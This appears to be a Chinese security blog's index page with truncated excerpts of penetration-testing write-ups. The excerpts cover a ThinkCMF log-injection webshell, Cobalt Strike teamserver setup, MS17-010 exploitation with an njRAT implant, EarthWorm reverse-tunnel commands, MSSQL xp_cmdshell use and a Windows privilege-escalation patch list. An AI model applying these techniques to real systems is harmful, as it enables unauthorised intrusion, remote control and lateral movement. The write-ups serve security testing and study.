ThinkCMF缓存getshell
前一阵子接到个项目,目标站是thinkCMF2.X搭建的,试过网上很多方法无法拿下,本地搭了个环境测试了下,最终成功拿下 由于thinkcmf2.x使用了thinkphp3.x作为开发框架,默认情况下启用了报错日志并且开启了模板缓存,导致可以使用加载一个不存在的模板来将生成一句话的PHP代码写入data/runtime/Logs/Portal目录下的日志文件中,再次包含该日志文件即可在网站根目录下生成一句话木马m.php 日志文件格式为YY_MM_DD.log,如当前日期为2019年12月12日,日志文件为19_12_12.log,完整路径为data/runtime/Logs/Portal/19_12_12.log 测试成功的环境Linux 宝塔[PHP7.2] Windwos PHPstudy...
Cobalt Strike Teamserer的搭建
记录下Cobalt Strike Teamserer的搭建 环境如下 Ubuntu 18.04 Cobalt Strike 3.14 准备一台Ubuntu 18.04的服务器,下载Cobalt Strike完整文件并传到服务器上 安装JDK1.8 apt install openjdk-8-jdk -y 装好后尝试执行./teamserver 10.16.11.55 cSro0t进行验证 启动成功 添加服务vi /etc/systemd/system/cobaltstrike.service [Unit]Description=CS ServiceAfter=network.targetWants=network.target[Service]Type=simplePIDFile=/run/CS.pidWorkingDirectory=/path_to_cobaltstrike_root_directory/ExecStart=/path_to_cobaltstrike_root_directory/teamserver YOUR_SERVER_IP...
复盘从一个监控主机到核心路由沦陷
在对内网进行ms17-010扫描时,发现2台之前没有出现过且没有打补丁的主机,于是,尝试了一波 kali主机在扫描时发现2台之前没有出现过且没有打补丁的主机 尝试打了一波 然后种了个njrat 翻文件的时候发现了点配置文件 down下来解压后发现是交换机的配置文件,于是有了一个大胆的想法 查看了被控主机的网络连接后,发现一个地址无法ping通,TCP包也无法到达,推测做了ACL 于是在被控机上搭了earthworm做转发 本机执行ew -s rcsocks -l 本地代理端口 -e 远端连接端口 被控机执行ew -s rssocks -d 主控机IP -e 远端连接端口...
内网渗透
在上次拿下了一台内网主机后,将其作为跳板,对192.168/16网段进行了扫描 介绍先上一张内网环境拓扑图 经过扫描后,识别出几个重要资产,并将他们作为目标进行针对性的测试 192.168.122.8192.168.122.11192.168.122.12192.168.122.13192.168.122.15192.168.122.16192.168.122.54192.168.122.60 通过banner和80端口title 识别到的资产如下 192.168.101.3->锐捷交换机 192.168.135.1->锐捷AC控制器,下联5个AP 192.168.122.8->VMware vCenter主机 192.168.122.6->...
mssql无webshell提权
在内网中扫描到了几台sa权限的mssql,报备后做了次简单的检测 侦查Navicat连上后查看xp_cdshell是否存在 发现存在的 执行exec master..xp_cmdshell "systeminfo"发现网卡连接了一个192.168/16的内网IP 主机名: WIN-XXXXXOS 名称: Microsoft Windows Server 2008 R2 Enterprise OS 版本: 6.1.7601 Service Pack 1 Build 7601OS 制造商: Microsoft CorporationOS 配置: 独立服务器OS 构件类型: Multiprocessor Free注册的所有人: Windows 用户注册的组织: 产品 ID: 00486-001-0001076-84214初始安装日期: 2016/7/29, 17:27:35系统启动时间: 2019/8/30,...
某省HW中遇到的提权
某省HW中遇到的一个环境提权笔记 0x01环境: OS: Windows Server 2012 R2 补丁情况: KB3139914 : MS16-032KB3124280 : MS16-016KB3134228 : MS16-014KB3079904 : MS15-097KB3077657 : MS15-077KB3045171 : MS15-051KB3000061 : MS14-058KB2829361 : MS13-046KB2850851 : MS13-053 EPATHOBJ 0day 限32位KB2707511 : MS12-042 sysret -pidKB2124261 : KB2271195 MS10-065 IIS7KB970483 : MS09-020 IIS6 安全软件:360套装 Webshell:...